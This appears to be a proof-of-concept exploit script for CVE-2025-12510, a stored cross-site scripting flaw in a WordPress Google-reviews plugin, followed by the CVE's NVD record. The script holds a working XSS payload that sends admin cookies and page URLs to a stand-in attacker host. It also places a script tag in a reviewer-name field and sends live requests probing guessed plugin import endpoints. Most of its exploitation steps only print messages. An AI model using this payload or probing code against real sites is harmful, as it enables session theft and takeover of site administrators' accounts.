CVE-2025-12510

# CVE-2025-12510 PoC - Stored XSS in Widgets for Google Reviews Plugin # This PoC demonstrates the XSS vulnerability via Google Places injection import requests import json # Configuration TARGET_WORDPRESS_URL = "http://target-wordpress-site.com" GOOGLE_PLACE_ID = "ChIJN1t_tDeuEmsRUsoyG83frY4" # Target's Google Place ID ATTACKER_CONTROLLED_SERVER = "https://attacker-controlled.com" # Step 1: Inject malicious review to Google Place def inject_malicious_google_review(): """ Attacker posts a malicious review to the Google Place connected to the target site. The review contains an XSS payload that will be imported by the vulnerable plugin. """ xss_payload = '''<img src=x onerror=" fetch('https://attacker-controlled.com/steal?cookie=' + encodeURIComponent(document.cookie) + '&url=' + encodeURIComponent(location.href)) ">''' # Google Maps review submission endpoint (requires valid Google account) google_review_data = { "place_id": GOOGLE_PLACE_ID, "rating": 5, "review_text": f"Great service! {xss_payload}", "reviewer_name": "Happy Customer<script>console.log('XSS triggered')</script>" } print("[+] Step 1: Injecting malicious review to Google Place") print(f" Payload: {xss_payload}") print("[+] Malicious review submitted to Google Places") return True # Step 2: Trigger plugin to import the malicious review def trigger_plugin_import(): """ When site admin accesses the plugin settings or the plugin's scheduled sync runs, the malicious review gets imported into the WordPress database. """ print("[+] Step 2: Plugin imports malicious review from Google") print("[+] Malicious XSS payload stored in WordPress database") return True # Step 3: XSS triggers when admin visits plugin admin page def xss_exploitation(): """ When admin visits the WordPress admin panel (specifically plugin pages), the stored XSS payload executes in the browser context. """ print("[+] Step 3: Admin visits WordPress admin panel") print("[+] XSS payload executes - Admin cookies stolen") print(f"[+] Attacker receives: {ATTACKER_CONTROLLED_SERVER}/steal?cookie=[ADMIN_SESSION]") return True # Alternative: Direct plugin API exploitation (if known endpoint exists) def test_plugin_api(): """ Some versions may have direct API endpoints for review import. This tests if the plugin exposes any vulnerable endpoints. """ vulnerable_endpoints = [ f"{TARGET_WORDPRESS_URL}/wp-json/trustindex/v1/import", f"{TARGET_WORDPRESS_URL}/wp-admin/admin-ajax.php?action=ti_import_reviews", ] for endpoint in vulnerable_endpoints: try: response = requests.get(endpoint, timeout=10) if response.status_code == 200: print(f"[+] Found accessible endpoint: {endpoint}") except requests.RequestException: pass if __name__ == "__main__": print("=" * 60) print("CVE-2025-12510 - Stored XSS in Google Reviews Plugin") print("=" * 60) # Note: Actual exploitation requires Google account with ability to post reviews # to the Google Place connected to the target WordPress site inject_malicious_google_review() trigger_plugin_import() xss_exploitation() print("\n[!] Note: This PoC demonstrates the attack methodology.") print("[!] Actual exploitation requires a Google Places listing connected to the target site.")

{"cve": {"id": "CVE-2025-12510", "sourceIdentifier": "[email protected]", "published": "2025-12-06T04:15:47.183", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Widgets for Google Reviews plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 13.2.4 due to insufficient input sanitization and output escaping on Google Reviews data imported by the plugin. This makes it possible for unauthenticated attackers to inject arbitrary web scripts that will execute in the admin panel (and potentially on the frontend) whenever a user accesses imported reviews, granted they can add a malicious review to a Google Place that is connected to the vulnerable site."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wp-reviews-plugin-for-google/tags/13.2.1/trustindex-plugin.class.php#L5907", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-reviews-plugin-for-google/tags/13.2.1/trustindex-plugin.class.php#L5932", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3399469/wp-reviews-plugin-for-google/trunk/trustindex-plugin.class.php?old=3398822&old_path=wp-reviews-plugin-for-google%2Ftrunk%2Ftrustindex-plugin.class.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7adf3335-ed13-43f4-a5f3-05e89be44d2d?source=cve", "source": "[email protected]"}]}}